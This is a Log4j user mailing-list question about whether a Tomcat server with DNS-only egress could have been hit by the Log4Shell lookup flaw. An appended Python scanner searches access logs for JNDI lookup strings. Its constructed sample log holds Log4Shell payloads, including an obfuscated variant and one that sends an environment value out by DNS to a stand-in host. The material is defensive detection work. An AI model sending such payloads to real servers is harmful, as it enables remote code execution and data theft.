Dear log4j experts,

It's sad that this nice project gets so much negative attention because of the current security issue.

I have a question to help me analyse the impact on my side: I've been using Log4j2 in a web application run in Tomcat 9.0 (always the latest version). On my Linux machine, this Tomcat instance runs as a dedicated user (e.g. "tomcatappuser"). Through iptables this user has never been allowed to make any outgoing connections to the Internet except to a few whitelisted IP addresses of the REST interfaces it uses. So the web application was never able to connect to arbitrary external IP addresses through any port (HTTP, LDAP, ...). No outgoing TCP, UDP or ICMP connections were possible except to whitelisted, trustworthy IP addresses.

BUT it was allowed to resolve host names through 2 whitelisted DNS server IP addresses (let's say e.g. 8.8.8.8). Now I've blocked even that and put the host name / IP address mappings of the used REST endpoints into /etc/hosts.

I have no indication that the Log4j vulnerability has actually been exploited on my system to do any harm. But could a malicious payload have arrived on my system inside the DNS response of my legitimate DNS server? I'm thinking of a TXT record that might contain a serialized Java object...? Was this also possible through this lookup expression resolution flaw?

Thanks in advance for your thoughts!
Reg

---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org
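As an added example for the "any indication it was exploited?" part of the question (this is not code from the original post or from the Log4j project), the Python script below scans Tomcat access-log lines for the JNDI lookup strings used against the lookup flaw. It undoes the two most common obfuscations (`${lower:x}`/`${upper:x}` wrappers and `${...:-x}` default-value syntax), reports each `${jndi:<scheme>:...}` lookup with the host it would try to contact, and separately flags lookups whose hostname itself contains a nested lookup such as `${env:...}`: that variant leaks the looked-up value through the DNS query alone, which is the case that matters on a host whose only allowed egress was DNS. The log lines, IP addresses and hostnames are constructed for the example.

```python
"""Scan Tomcat access-log lines for Log4j JNDI lookup strings.

Added example, not code from the original post or from the Log4j project.
Assumes Tomcat's common access-log format; the sample lines below are constructed.
"""
import re
from typing import List, NamedTuple

# Constructed sample lines (not real traffic). Lines 2-4 carry JNDI lookups in
# the User-Agent or query string; line 6 carries a non-JNDI lookup probe.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Dec/2021:10:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"
203.0.113.9 - - [11/Dec/2021:10:03:44 +0000] "GET /?x=${${lower:j}ndi:${lower:l}${lower:d}ap://example.org/z} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.11 - - [11/Dec/2021:10:04:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:dns://${env:HOSTNAME}.dns-log.example/x}"
203.0.113.13 - - [11/Dec/2021:10:05:01 +0000] "POST /api HTTP/1.1" 200 12 "-" "Mozilla/5.0 (jndi is a word)"
203.0.113.15 - - [11/Dec/2021:10:06:30 +0000] "GET /?q=${sys:java.version} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


class Finding(NamedTuple):
    line_no: int
    scheme: str   # ldap, ldaps, rmi, dns, ... as written in the lookup
    target: str   # host[:port] the lookup would contact, after de-obfuscation
    exfil: bool   # a nested ${...} sits inside the hostname: its value leaves via the DNS query


# Obfuscation wrappers seen around the literal "jndi": ${lower:j} / ${upper:J}
# and the default-value form ${anything:-j}.  Only these common forms are handled.
_CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# ${jndi:<scheme>:[//]<target>...}; the target may itself contain a ${...} lookup.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/{0,2}((?:\$\{[^}]*\}|[^/}\s])+)",
    re.IGNORECASE,
)


def normalize(text: str) -> str:
    """Collapse the obfuscation wrappers, innermost first, until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_WRAP.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def scan_lines(lines) -> List[Finding]:
    """Return one Finding per JNDI lookup found, in line order."""
    findings = []
    for n, line in enumerate(lines, 1):
        if "${" not in line:
            continue  # cheap pre-filter: no lookup syntax at all on this line
        for m in _JNDI.finditer(normalize(line)):
            target = m.group(2)
            findings.append(Finding(n, m.group(1).lower(), target, "${" in target))
    return findings


def scan_text(text: str) -> List[Finding]:
    return scan_lines(text.splitlines())


def lookup_only_lines(text: str) -> List[int]:
    """Lines with ${...} syntax but no JNDI lookup: probes for lookup evaluation,
    or obfuscation the normalizer does not know about. Review these by hand."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if "${" in line and not _JNDI.search(normalize(line))]


if __name__ == "__main__":
    for f in scan_text(SAMPLE_LOG):
        flag = "  [value exfiltrated via hostname / DNS]" if f.exfil else ""
        print(f"line {f.line_no}: jndi:{f.scheme} -> {f.target}{flag}")
    print("lookup syntax without jndi on lines:", lookup_only_lines(SAMPLE_LOG))
```

Against a real installation, feed `scan_lines(open(path))` every Tomcat access log (and any application log that records request data) for the period in question. A hit with `exfil=True` means the request asked Log4j to resolve a name containing local data, and a DNS resolver that was reachable at the time would have carried that name out regardless of the TCP/UDP egress rules; the `lookup_only_lines` output deserves a look as well, since the normalizer only knows the common obfuscations.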